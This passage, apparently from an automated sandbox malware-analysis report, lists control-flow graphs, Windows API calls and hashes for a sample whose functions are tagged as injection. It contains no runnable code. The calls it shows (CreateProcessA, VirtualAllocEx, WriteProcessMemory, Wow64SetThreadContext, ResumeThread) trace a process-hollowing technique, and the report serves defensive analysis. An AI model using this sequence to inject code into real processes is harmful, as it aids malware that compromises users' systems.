6b848a8 Wow64SetThreadContext 32076->32078 32079 6b848b0 Wow64SetThreadContext 32076->32079 32077 6b874e9 32078->32077 32079->32077 32081 6b86d0f 32080->32081 32081->31990 32082 6b87551 32081->32082 32083 6b84a48 WriteProcessMemory 32081->32083 32084 6b84a40 WriteProcessMemory 32081->32084 32085 6b84988 VirtualAllocEx 32081->32085 32086 6b84980 VirtualAllocEx 32081->32086 32082->31990 32083->32081 32084->32081 32085->32081 32086->32081 32166 6b84cd0 32087->32166 32170 6b84cc4 32087->32170 32092 6b86e82 32091->32092 32093 6b8756a 32092->32093 32094 6b847ff ResumeThread 32092->32094 32095 6b84800 ResumeThread 32092->32095 32094->32092 32095->32092 32097 6b86d0f 32096->32097 32097->31990 32098 6b87551 32097->32098 32099 6b84988 VirtualAllocEx 32097->32099 32100 6b84980 VirtualAllocEx 32097->32100 32101 6b84a48 WriteProcessMemory 32097->32101 32102 6b84a40 WriteProcessMemory 32097->32102 32098->31990 32099->32097 32100->32097 32101->32097 32102->32097 32104 6b86d0f 32103->32104 32104->31990 32105 6b87551 32104->32105 32106 6b84988 VirtualAllocEx 32104->32106 32107 6b84980 VirtualAllocEx 32104->32107 32108 6b84a48 WriteProcessMemory 32104->32108 32109 6b84a40 WriteProcessMemory 32104->32109 32105->31990 32106->32104 32107->32104 32108->32104 32109->32104 32112 6b86d0f 32110->32112 32111 6b87551 32111->31990 32112->31990 32112->32111 32113 6b84988 VirtualAllocEx 32112->32113 32114 6b84980 VirtualAllocEx 32112->32114 32115 6b84a48 WriteProcessMemory 32112->32115 32116 6b84a40 WriteProcessMemory 32112->32116 32113->32112 32114->32112 32115->32112 32116->32112 32118 6b87454 32117->32118 32119 6b84a48 WriteProcessMemory 32117->32119 32120 6b84a40 WriteProcessMemory 32117->32120 32119->32118 32120->32118 32122 6b8706a 32121->32122 32124 6b84a48 WriteProcessMemory 32122->32124 32125 6b84a40 WriteProcessMemory 32122->32125 32123 6b8714f 32123->31990 32124->32123 32125->32123 32127 6b84800 ResumeThread 32126->32127 32129 6b84871 32127->32129 32129->32043 32131 6b84840 ResumeThread 32130->32131 32133 6b84871 32131->32133 32133->32043 32135 6b84a90 WriteProcessMemory 32134->32135 32137 6b84ae7 32135->32137 32137->32048 32139 6b84a49 WriteProcessMemory 32138->32139 32141 6b84ae7 32139->32141 32141->32048 32143 6b849c8 VirtualAllocEx 32142->32143 32145 6b84a05 32143->32145 32145->32048 32147 6b84988 VirtualAllocEx 32146->32147 32149 6b84a05 32147->32149 32149->32048 32151 6b848b0 Wow64SetThreadContext 32150->32151 32153 6b8493d 32151->32153 32153->32063 32155 6b848f5 Wow64SetThreadContext 32154->32155 32157 6b8493d 32155->32157 32157->32063 32159 6b84b83 ReadProcessMemory 32158->32159 32161 6b84bc7 32159->32161 32161->32067 32163 6b84b38 ReadProcessMemory 32162->32163 32165 6b84bc7 32163->32165 32165->32067 32167 6b84d59 CreateProcessA 32166->32167 32169 6b84f1b 32167->32169 32171 6b84d59 CreateProcessA 32170->32171 32173 6b84f1b 32171->32173

                                  Executed Functions

                                  Function 06B84CC4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 508 6b84cc4-6b84d65 510 6b84d9e-6b84dbe 508->510 511 6b84d67-6b84d71 508->511 516 6b84dc0-6b84dca 510->516 517 6b84df7-6b84e26 510->517 511->510 512 6b84d73-6b84d75 511->512 514 6b84d98-6b84d9b 512->514 515 6b84d77-6b84d81 512->515 514->510 518 6b84d83 515->518 519 6b84d85-6b84d94 515->519 516->517 520 6b84dcc-6b84dce 516->520 527 6b84e28-6b84e32 517->527 528 6b84e5f-6b84f19 CreateProcessA 517->528 518->519 519->519 521 6b84d96 519->521 522 6b84dd0-6b84dda 520->522 523 6b84df1-6b84df4 520->523 521->514 525 6b84ddc 522->525 526 6b84dde-6b84ded 522->526 523->517 525->526 526->526 529 6b84def 526->529 527->528 530 6b84e34-6b84e36 527->530 539 6b84f1b-6b84f21 528->539 540 6b84f22-6b84fa8 528->540 529->523 532 6b84e38-6b84e42 530->532 533 6b84e59-6b84e5c 530->533 534 6b84e44 532->534 535 6b84e46-6b84e55 532->535 533->528 534->535 535->535 536 6b84e57 535->536 536->533 539->540 550 6b84fb8-6b84fbc 540->550 551 6b84faa-6b84fae 540->551 553 6b84fcc-6b84fd0 550->553 554 6b84fbe-6b84fc2 550->554 551->550 552 6b84fb0 551->552 552->550 556 6b84fe0-6b84fe4 553->556 557 6b84fd2-6b84fd6 553->557 554->553 555 6b84fc4 554->555 555->553 558 6b84ff6-6b84ffd 556->558 559 6b84fe6-6b84fec 556->559 557->556 560 6b84fd8 557->560 561 6b84fff-6b8500e 558->561 562 6b85014 558->562 559->558 560->556 561->562 564 6b85015 562->564 564->564
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B84F06
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 9854ff102dfe6f6134945ae62dab3901d51eedd0f296fed51a3491fc8504e338
                                  • Instruction ID: 24be0f8e217ae21d0fa3823b0e9c426c8491685c98fdcd6ebf50a420f0856ae9
                                  • Opcode Fuzzy Hash: 9854ff102dfe6f6134945ae62dab3901d51eedd0f296fed51a3491fc8504e338
                                  • Instruction Fuzzy Hash: 3B914BB1D0021A8FEB64DFA8C8417DDBAF2FF48314F1485A9E808A7294DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84CD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 565 6b84cd0-6b84d65 567 6b84d9e-6b84dbe 565->567 568 6b84d67-6b84d71 565->568 573 6b84dc0-6b84dca 567->573 574 6b84df7-6b84e26 567->574 568->567 569 6b84d73-6b84d75 568->569 571 6b84d98-6b84d9b 569->571 572 6b84d77-6b84d81 569->572 571->567 575 6b84d83 572->575 576 6b84d85-6b84d94 572->576 573->574 577 6b84dcc-6b84dce 573->577 584 6b84e28-6b84e32 574->584 585 6b84e5f-6b84f19 CreateProcessA 574->585 575->576 576->576 578 6b84d96 576->578 579 6b84dd0-6b84dda 577->579 580 6b84df1-6b84df4 577->580 578->571 582 6b84ddc 579->582 583 6b84dde-6b84ded 579->583 580->574 582->583 583->583 586 6b84def 583->586 584->585 587 6b84e34-6b84e36 584->587 596 6b84f1b-6b84f21 585->596 597 6b84f22-6b84fa8 585->597 586->580 589 6b84e38-6b84e42 587->589 590 6b84e59-6b84e5c 587->590 591 6b84e44 589->591 592 6b84e46-6b84e55 589->592 590->585 591->592 592->592 593 6b84e57 592->593 593->590 596->597 607 6b84fb8-6b84fbc 597->607 608 6b84faa-6b84fae 597->608 610 6b84fcc-6b84fd0 607->610 611 6b84fbe-6b84fc2 607->611 608->607 609 6b84fb0 608->609 609->607 613 6b84fe0-6b84fe4 610->613 614 6b84fd2-6b84fd6 610->614 611->610 612 6b84fc4 611->612 612->610 615 6b84ff6-6b84ffd 613->615 616 6b84fe6-6b84fec 613->616 614->613 617 6b84fd8 614->617 618 6b84fff-6b8500e 615->618 619 6b85014 615->619 616->615 617->613 618->619 621 6b85015 619->621 621->621
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B84F06
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 5c64b285ac14a7bdef1e0ba8fa78cbe5705c749d4cc6a66b2182aa711eb7fafb
                                  • Instruction ID: 0af95b92089b674baa5809718f9891734976de36c092a66e9d7a5447be5b4ba9
                                  • Opcode Fuzzy Hash: 5c64b285ac14a7bdef1e0ba8fa78cbe5705c749d4cc6a66b2182aa711eb7fafb
                                  • Instruction Fuzzy Hash: 2C913AB1D0061A8FEB64DF68C84179EBBF2FF48314F1485A9E808A7294DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251AE70 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 622 251ae70-251ae7f 623 251ae81-251ae8e call 2519878 622->623 624 251aeab-251aeaf 622->624 629 251ae90 623->629 630 251aea4 623->630 626 251aeb1-251aebb 624->626 627 251aec3-251af04 624->627 626->627 633 251af11-251af1f 627->633 634 251af06-251af0e 627->634 678 251ae96 call 251b0f8 629->678 679 251ae96 call 251b108 629->679 630->624 635 251af21-251af26 633->635 636 251af43-251af45 633->636 634->633 638 251af31 635->638 639 251af28-251af2f call 251a854 635->639 641 251af48-251af4f 636->641 637 251ae9c-251ae9e 637->630 640 251afe0-251b0a0 637->640 643 251af33-251af41 638->643 639->643 673 251b0a2-251b0a5 640->673 674 251b0a8-251b0d3 GetModuleHandleW 640->674 644 251af51-251af59 641->644 645 251af5c-251af63 641->645 643->641 644->645 647 251af70-251af79 call 251a864 645->647 648 251af65-251af6d 645->648 653 251af86-251af8b 647->653 654 251af7b-251af83 647->654 648->647 655 251afa9-251afad 653->655 656 251af8d-251af94 653->656 654->653 661 251afb3-251afb6 655->661 656->655 658 251af96-251afa6 call 251a874 call 251a884 656->658 658->655 663 251afd9-251afdf 661->663 664 251afb8-251afd6 661->664 664->663 673->674 675 251b0d5-251b0db 674->675 676 251b0dc-251b0f0 674->676 675->676 678->637 679->637
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0251B0C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 88a72bc04ecf8b903edc778a4fe657518783dc8fb1ada72c9d5fd7cfed884cec
                                  • Instruction ID: 4b4b1e8143c789ab8abc15c955f8fa30f33007863c8157230a05cd7b685f6cf5
                                  • Opcode Fuzzy Hash: 88a72bc04ecf8b903edc778a4fe657518783dc8fb1ada72c9d5fd7cfed884cec
                                  • Instruction Fuzzy Hash: F67168B1A01B059FEB25DF29D14075ABBF1FF88304F008A2DE48AD7A50DB34E945CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04BC1CE4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 680 4bc1ce4-4bc1d56 682 4bc1d58-4bc1d5e 680->682 683 4bc1d61-4bc1d68 680->683 682->683 684 4bc1d6a-4bc1d70 683->684 685 4bc1d73-4bc1dab 683->685 684->685 686 4bc1db3-4bc1e12 CreateWindowExW 685->686 687 4bc1e1b-4bc1e53 686->687 688 4bc1e14-4bc1e1a 686->688 692 4bc1e55-4bc1e58 687->692 693 4bc1e60 687->693 688->687 692->693 694 4bc1e61 693->694 694->694
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BC1E02
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 4f311e9c29cefc956bffea0b538bc3f6c4d26c23595acee53354848fd7b7165b
                                  • Instruction ID: 98f419c23348b0ff6ba7ad403a2657aab972d7a3ce82879f8a107401e5257940
                                  • Opcode Fuzzy Hash: 4f311e9c29cefc956bffea0b538bc3f6c4d26c23595acee53354848fd7b7165b
                                  • Instruction Fuzzy Hash: B551D0B1D00309EFDB14CF99C984ADEBBB6FF48314F24856AE418AB211D775A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04BC0AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 695 4bc0aa8-4bc1d56 697 4bc1d58-4bc1d5e 695->697 698 4bc1d61-4bc1d68 695->698 697->698 699 4bc1d6a-4bc1d70 698->699 700 4bc1d73-4bc1e12 CreateWindowExW 698->700 699->700 702 4bc1e1b-4bc1e53 700->702 703 4bc1e14-4bc1e1a 700->703 707 4bc1e55-4bc1e58 702->707 708 4bc1e60 702->708 703->702 707->708 709 4bc1e61 708->709 709->709
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BC1E02
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 3b547d0c92a89588266ef891829c014777dc14d0f4e247de0b40404d2b057a4b
                                  • Instruction ID: 3b54fa5db6dab748b1c0ac3d8146d8fd98ff82e9ede505aab25c5a65ce72645d
                                  • Opcode Fuzzy Hash: 3b547d0c92a89588266ef891829c014777dc14d0f4e247de0b40404d2b057a4b
                                  • Instruction Fuzzy Hash: FA51B0B1D00209EFDB14CF99C984ADEBBB5FF48314F64856AE818AB215D774A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04BC0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 835 4bc0bfc-4bc42fc 838 4bc43ac-4bc43cc call 4bc0ad4 835->838 839 4bc4302-4bc4307 835->839 846 4bc43cf-4bc43dc 838->846 841 4bc4309-4bc4340 839->841 842 4bc435a-4bc4392 CallWindowProcW 839->842 849 4bc4349-4bc4358 841->849 850 4bc4342-4bc4348 841->850 844 4bc439b-4bc43aa 842->844 845 4bc4394-4bc439a 842->845 844->846 845->844 849->846 850->849
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BC4381
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: a904cd16b20708bba434afb7640bdf1a3553532f2ace6619a4c7930b8c4fc733
                                  • Instruction ID: 8bc9a39f11364bcd7e1a35744b57f601dd3b6cbeee0d3628a16b1846d6b7f643
                                  • Opcode Fuzzy Hash: a904cd16b20708bba434afb7640bdf1a3553532f2ace6619a4c7930b8c4fc733
                                  • Instruction Fuzzy Hash: 0F411AB59003059FDB14DF99C888AAEBBF5FF88314F14C59DE519A7321D374A941CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 818 251590c-2515914 819 251591c-25159d9 CreateActCtxA 818->819 821 25159e2-2515a3c 819->821 822 25159db-25159e1 819->822 829 2515a4b-2515a4f 821->829 830 2515a3e-2515a41 821->830 822->821 831 2515a51-2515a5d 829->831 832 2515a60 829->832 830->829 831->832 834 2515a61 832->834 834->834
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 025159C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 8075f4944d7b1826f2ca81147a03ba37f353dd79f8b5d0013f9366bd1f91e343
                                  • Instruction ID: bcef6c3d441dbaecf30997854a95bd647f75ba71c4929e74369a9ec0fb95b6d2
                                  • Opcode Fuzzy Hash: 8075f4944d7b1826f2ca81147a03ba37f353dd79f8b5d0013f9366bd1f91e343
                                  • Instruction Fuzzy Hash: 4F41F3B0D00619CBEB24DFAAC9847CDBBF5FF48305F60806AD419AB254DB75694ACF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02514248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 852 2514248-25159d9 CreateActCtxA 855 25159e2-2515a3c 852->855 856 25159db-25159e1 852->856 863 2515a4b-2515a4f 855->863 864 2515a3e-2515a41 855->864 856->855 865 2515a51-2515a5d 863->865 866 2515a60 863->866 864->863 865->866 868 2515a61 866->868 868->868
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 025159C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: a1cd44156c88fe23df4854501e5b0d597f0051caedcff0e9f1c052e27d9666e6
                                  • Instruction ID: 9494b6cdcb659564bdca95844bece9924eccf134f23cd130fcaf7d67392e6063
                                  • Opcode Fuzzy Hash: a1cd44156c88fe23df4854501e5b0d597f0051caedcff0e9f1c052e27d9666e6
                                  • Instruction Fuzzy Hash: E641D2B0C00619CBEB24DFAAC884B9DBBF5FF49305F60806AD408AB255DB756945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84A40 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B84AD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 2f945b35d3f25655142d5ef5e74c2a2f9b8dca701b60623f1fdbfe64e02b67c9
                                  • Instruction ID: f73e0157c32fd6e6bb286e0d1b69fd73817186aa5d1624bc58070ea0557ad8b8
                                  • Opcode Fuzzy Hash: 2f945b35d3f25655142d5ef5e74c2a2f9b8dca701b60623f1fdbfe64e02b67c9
                                  • Instruction Fuzzy Hash: 2D2127B59003199FDB10DFAAC985BEEBBF5FF48310F10842AE919A7250D7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B84AD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 7910d168003a5e9baf318d19b5037cc8182c514e3ad8281671491df014edba63
                                  • Instruction ID: e5ed6ff4420843b34f234369978f482cec73d3958705904f8753e2259a74751c
                                  • Opcode Fuzzy Hash: 7910d168003a5e9baf318d19b5037cc8182c514e3ad8281671491df014edba63
                                  • Instruction Fuzzy Hash: 1E2139B1D003099FCB10DFAAC985BEEBBF5FF48310F108429E919A7250C7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B848A8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B8492E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ce4f34df74e2ca0c1b12e992392a6b1f5d29fdf81fb18d4d4374df16d603546d
                                  • Instruction ID: deeea7fc9e33e8787630c0ba8ce6302cc8aa77c1ce6cd0ff9eaf1882add2d0ba
                                  • Opcode Fuzzy Hash: ce4f34df74e2ca0c1b12e992392a6b1f5d29fdf81fb18d4d4374df16d603546d
                                  • Instruction Fuzzy Hash: D4216DB1D003098FDB10DFAAC5857EEBBF4EF48314F108429D459A7241C7789545CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251C9E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0251D306,?,?,?,?,?), ref: 0251D3C7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: efd98c3be33eb8a74da417bf3de3859295eb77f0aa325b0ecc3a4c362ad26182
                                  • Instruction ID: 3c4795787bb15e17a39b1cbb7c3e6e06c08ce4dbc0c6e6d59427a70662061efc
                                  • Opcode Fuzzy Hash: efd98c3be33eb8a74da417bf3de3859295eb77f0aa325b0ecc3a4c362ad26182
                                  • Instruction Fuzzy Hash: 0B21E6B59012089FDB10CF9AD584AEEFFF4FB48314F14845AE914A7310D378A954CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251D338 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0251D306,?,?,?,?,?), ref: 0251D3C7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 920b5ebbc138211ad54131583b11d7db1208761e814de27fd91c23e678bd7a4f
                                  • Instruction ID: c0364e2068cc73f07718fb1262af6fc0a759d8258b93d6f4e1a36e3fa44c9c39
                                  • Opcode Fuzzy Hash: 920b5ebbc138211ad54131583b11d7db1208761e814de27fd91c23e678bd7a4f
                                  • Instruction Fuzzy Hash: CA21E4B5900208AFDB10CF9AD984ADEBFF9FB48314F14841AE918A3310C378A940CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84B37 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B84BB8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: bb7290577a5d400aff5d23d17f201581c3c7e1c27fb2585aad9fa39d4374c072
                                  • Instruction ID: f593e932f5782169583b054957c374ff5dd2db7bc6d36429cba853e57747b46d
                                  • Opcode Fuzzy Hash: bb7290577a5d400aff5d23d17f201581c3c7e1c27fb2585aad9fa39d4374c072
                                  • Instruction Fuzzy Hash: 6021F5B1C003599FDB10DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B84BB8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 1e4d1e90f0e40f01a1707613042d2c09e543df45041352cecb64f3c9fd4b5abb
                                  • Instruction ID: 83ed43e181ad6bdd835aed734e72bad5e367034266659cb24a84e9b939710b4d
                                  • Opcode Fuzzy Hash: 1e4d1e90f0e40f01a1707613042d2c09e543df45041352cecb64f3c9fd4b5abb
                                  • Instruction Fuzzy Hash: F921F5B1C003599FDB10DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944DBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B848B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B8492E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 0b2a13c6007166bd0f7dfa37ee09f7c5e4f5f0ede506aed6d2a1738531bc3da8
                                  • Instruction ID: bbe14b92de051854c651cdba80cb0071c791262a15e9fb8b311ffb991bc3e74a
                                  • Opcode Fuzzy Hash: 0b2a13c6007166bd0f7dfa37ee09f7c5e4f5f0ede506aed6d2a1738531bc3da8
                                  • Instruction Fuzzy Hash: 6C215BB1D003098FDB10DFAAC9857EEBBF4EF48324F108429D459A7241CB789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84980 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B849F6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f84465078848fc562dac0678d00c5400b24e24e2b1b8121de2bcacbb93b3dd84
                                  • Instruction ID: 281af91dbd14695853a7c858fa3767629e4d663e0a2bde52265097d3959df15b
                                  • Opcode Fuzzy Hash: f84465078848fc562dac0678d00c5400b24e24e2b1b8121de2bcacbb93b3dd84
                                  • Instruction Fuzzy Hash: 751129718002499FDB20DFAAC945BDFBFF5EF48320F248419E559A7250C775A584CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251A8B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0251B141,00000800,00000000,00000000), ref: 0251B352
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
